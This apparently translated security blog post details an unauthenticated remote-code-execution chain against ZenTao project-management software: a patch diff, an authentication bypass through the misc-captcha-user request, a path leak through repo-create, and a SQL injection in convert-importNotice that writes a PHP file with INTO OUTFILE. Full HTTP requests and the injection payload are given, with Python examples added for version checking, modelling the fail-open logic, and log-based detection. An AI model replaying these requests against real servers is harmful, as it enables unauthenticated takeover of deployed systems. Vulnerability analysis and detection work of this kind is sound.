c1ay's blog

ZenTao (禅道) vulnerability chain: unauthenticated RCE

2023/01/13

Since this has already been posted in many places, there is no point in keeping it private any longer…

Local test environment: ZenTao 18.0.beta1

Affected versions

17.4 <= version <= 18.0.beta1 (open-source edition)

3.4 <= version <= 4.0.beta1 (Max edition, 旗舰版)

7.4 <= version <= 8.0.beta1 (Biz/enterprise edition, 企业版)
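Before chasing the chain it helps to have a deterministic check that a version string reported by an instance sits inside the ranges above. The following Python is an added example, not code from the original post or from ZenTao itself; the version grammar it parses (MAJOR.MINOR[.PATCH][.betaN]) and the edition keys "open", "max" and "biz" are assumptions chosen here to label the three editions listed above.

```python
import re

# Affected ranges as stated on the page, keyed by edition
# ("open" = open-source, "max" = 旗舰版, "biz" = 企业版; key names are this example's own).
AFFECTED_RANGES = {
    "open": ("17.4", "18.0.beta1"),
    "max": ("3.4", "4.0.beta1"),
    "biz": ("7.4", "8.0.beta1"),
}

# Assumed grammar: MAJOR.MINOR[.PATCH][.(alpha|beta|rc)N], e.g. 17.4, 18.0.beta1
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:\.?(alpha|beta|rc)(\d*))?$", re.IGNORECASE
)
_STAGE = {"alpha": 0, "beta": 1, "rc": 2, None: 3}   # final release sorts last


def parse_version(version):
    """Turn a ZenTao-style version string into a tuple that compares correctly.

    Pre-release tags sort below the final release of the same number, so
    18.0.beta1 -> (18, 0, 0, 1, 1) is less than 18.0 -> (18, 0, 0, 3, 0).
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, tag, tag_num = m.groups()
    return (int(major), int(minor), int(patch or 0),
            _STAGE[tag.lower() if tag else None], int(tag_num or 0))


def is_affected(version, edition="open"):
    """True if `version` of the given edition falls inside the page's affected range."""
    low, high = AFFECTED_RANGES[edition]
    return parse_version(low) <= parse_version(version) <= parse_version(high)


if __name__ == "__main__":
    for v, ed in (("18.0.beta1", "open"), ("18.0", "open"), ("17.3", "open"), ("4.0.beta1", "max")):
        print(f"{ed:4} {v:12} affected={is_affected(v, ed)}")
```

The ordering matters at the upper bound: 18.0.beta1 is inside the range while the final 18.0 release is not, so a naive string comparison would get it backwards.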

Exploitation requirements

No login required; no other preconditions.

Authentication bypass

The login check passes through the following, in order:

the __construct method of framework/base/control.class.php

www/index.php: $common->checkPriv();


Patch comparison

Diffing the patched and unpatched checkPriv method of module/common/model.php shows that echo $endResponseException->getContent(); was changed to die($endResponseException->getContent());

The no-login whitelist (the module methods reachable without authentication) is defined in config/zentaopms.php.

The captcha method in module/misc/control.php writes a session variable. Requesting it without logging in is enough to populate the session's user variable:

GET /zentao/misc-captcha-user HTTP/1.1
Host: 192.168.157.174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zentaosid=0f94562eee63fdffc089ad8a3e867ead;
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

How the bypass works:

Once the session user variable is set, checkPriv in module/common/model.php takes the if(isset($this->app->user)) branch and, because the caller holds no rights to the requested module method, calls $this->deny($module, $method);

Following into the deny method of module/common/model.php, execution eventually reaches helper::end();

The end method of framework/helper.class.php throws an EndResponseException. checkPriv in module/common/model.php catches that exception right there and merely echoes its content; nothing terminates the request, so www/index.php carries on and runs the requested module method. That is the privilege bypass.

The patch replaces echo with die, so execution terminates at that point instead of continuing, which closes the bypass.
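To make the control-flow failure concrete, here is a Python model of the call chain described above. It is an added example, not the original post's code and not ZenTao's PHP; it keeps the names from the page (checkPriv, deny, helper::end, EndResponseException) and models die() as an exception that the front controller catches. The session "rights" set and the redirect-to-login branch for a missing session user are assumptions of the model.

```python
class EndResponseException(Exception):
    """Stand-in for ZenTao's EndResponseException, raised by helper::end()."""


def helper_end(content):
    # framework/helper.class.php -> end(): finish the response by raising
    raise EndResponseException(content)


def deny(module, method):
    # module/common/model.php -> deny(): build the "access denied" page, then end
    helper_end(f"deny page for {module}-{method}")


def check_priv(session, module, method, patched):
    """Model of module/common/model.php -> checkPriv().

    Returning normally means "request may proceed". Unpatched, the exception
    raised by deny() is caught and only echoed, so the function also returns
    normally after a denial. Patched, die() ends the process; that is modelled
    here by re-raising, so the dispatcher never reaches the module method.
    The "rights" set and the login redirect are assumptions of this model.
    """
    if session.get("user") is None:
        raise EndResponseException("redirect to user-login")   # assumed else-branch
    if (module, method) in session.get("rights", set()):
        return                                                  # genuinely permitted
    try:
        deny(module, method)
    except EndResponseException as exc:
        print(exc)            # unpatched: echo $endResponseException->getContent();
        if patched:
            raise             # patched:   die($endResponseException->getContent());
    # unpatched code reaches this point and returns as if the check had passed


def dispatch(session, module, method, patched):
    """Model of www/index.php: $common->checkPriv(), then the module method."""
    try:
        check_priv(session, module, method, patched)
    except EndResponseException as exc:
        return f"stopped: {exc}"
    return f"executed {module}-{method}"


# Session as left by GET /zentao/misc-captcha-user: "user" is set, but the
# caller holds no rights. The actual value is irrelevant to isset().
GUEST = {"user": "planted-by-misc-captcha-user", "rights": set()}

if __name__ == "__main__":
    print(dispatch(GUEST, "convert", "importNotice", patched=False))  # executed convert-importNotice
    print(dispatch(GUEST, "convert", "importNotice", patched=True))   # stopped: deny page for convert-importNotice
```

The general lesson is the same outside ZenTao: an authorization routine that reports a denial by catching and printing an exception, rather than by terminating or returning a decision its caller honours, is a fail-open design.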

SQL injection

The same patch diff shows a SQL injection fix in the dbExists method of module/convert/model.php: the database name it receives is concatenated into the query.

A global search for dbExists shows it is called from the importNotice method of module/convert/control.php.

Corresponding route:
/zentao/convert-importNotice

Because the injected statement can write a file (SELECT ... INTO OUTFILE), combining it with the authentication bypass above gives an unauthenticated file write. Note that INTO OUTFILE only succeeds when the MySQL account holds the FILE privilege and secure_file_priv permits the target directory:

POST /zentao/convert-importNotice HTTP/1.1
Host: 192.168.157.174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.174
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: zentaosid=0f94562eee63fdffc089ad8a3e867ead
X-Requested-With: XMLHttpRequest
Content-Length: 111
Origin: http://192.168.157.174
Connection: close
Pragma: no-cache
Cache-Control: no-cache

dbName=1';select '<?php phpinfo();?>' into outfile 'C:/Users/admin/Desktop/zbox/app/zentao/www/install.php'-- -
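From the defensive side, web-server access logs do not carry POST bodies, so the injection payload itself is invisible there; what is visible is the chain's sequence: a hit on misc-captcha-user followed shortly by a request to an endpoint that only an authenticated user should reach. The following Python detector is an added example, not from the original post. The log lines are constructed for illustration, and the combined log format, the ten-minute pairing window and the list of sensitive endpoints are assumptions.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format (assumed here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The request that plants the session user (page's first request). Other
# misc-captcha-<var> names set a different session key and do not satisfy
# isset($this->app->user), so they are deliberately not matched.
SESSION_PLANT = "/misc-captcha-user"

# Endpoints the page reaches through the bypass; both normally need a logged-in
# user. Extend as needed; matched as substrings of the request path.
POST_AUTH_ONLY = ("/convert-importNotice", "/repo-create")

WINDOW = timedelta(minutes=10)   # assumed pairing window


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_chain(lines, window=WINDOW):
    """Return a list of (ip, method, path) for each post-auth-only request that
    follows a misc-captcha-user hit from the same client within `window`."""
    last_plant = {}          # ip -> time of the most recent misc-captcha-user hit
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if SESSION_PLANT in rec["path"]:
            last_plant[rec["ip"]] = rec["ts"]
            continue
        if any(p in rec["path"] for p in POST_AUTH_ONLY):
            planted = last_plant.get(rec["ip"])
            if planted is not None and timedelta(0) <= rec["ts"] - planted <= window:
                alerts.append((rec["ip"], rec["method"], rec["path"]))
    return alerts


# Constructed sample: one client runs the page's chain; an admin creates a repo
# legitimately; another client's captcha hit is too old to pair with anything.
SAMPLE_LOG = """\
10.0.0.9 - - [13/Jan/2023:09:00:00 +0800] "GET /zentao/misc-captcha-user HTTP/1.1" 200 1234 "-" "curl/7.81.0"
10.0.0.9 - - [13/Jan/2023:09:30:00 +0800] "POST /zentao/repo-create HTTP/1.1" 200 512 "-" "curl/7.81.0"
192.168.157.1 - - [13/Jan/2023:10:00:01 +0800] "GET /zentao/misc-captcha-user HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.157.1 - - [13/Jan/2023:10:00:05 +0800] "POST /zentao/repo-create HTTP/1.1" 200 512 "http://192.168.157.174" "Mozilla/5.0"
192.168.157.1 - - [13/Jan/2023:10:00:09 +0800] "POST /zentao/convert-importNotice HTTP/1.1" 200 88 "http://192.168.157.174" "Mozilla/5.0"
10.0.0.7 - - [13/Jan/2023:11:30:00 +0800] "POST /zentao/repo-create HTTP/1.1" 200 512 "http://192.168.157.174/repo-browse" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_LOG.splitlines()):
        print("possible ZenTao auth-bypass chain:", alert)
```

Pairing on the client address is a pragmatic choice for plain access logs; where the zentaosid cookie is logged, keying on it instead removes the false positives that shared egress addresses cause.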


Obtaining the web root

Writing a file through the injection requires the absolute path of the web directory. There are many ways to obtain it; only one is shown here: the response to the following repo-create request, sent with placeholder parameter values, discloses the path.

POST /zentao/repo-create HTTP/1.1
Host: 192.168.157.174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.174/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: zentaosid=0f94562eee63fdffc089ad8a3e867ead
X-Requested-With: XMLHttpRequest
Content-Length: 112
Origin: http://192.168.157.174/
Connection: close
Pragma: no-cache
Cache-Control: no-cache

SCM=Subversion&name=1&path=1&encoding=utf-8&client=1&account=1&password=1&encrypt=base64&desc=&uid=626134383da5e


One more note:
There are many more post-authentication vulnerabilities in ZenTao, command execution among them, which are not covered here. The point of this RCE is the authentication bypass: it turns any of those post-authentication bugs into an unauthenticated (pre-auth) RCE.
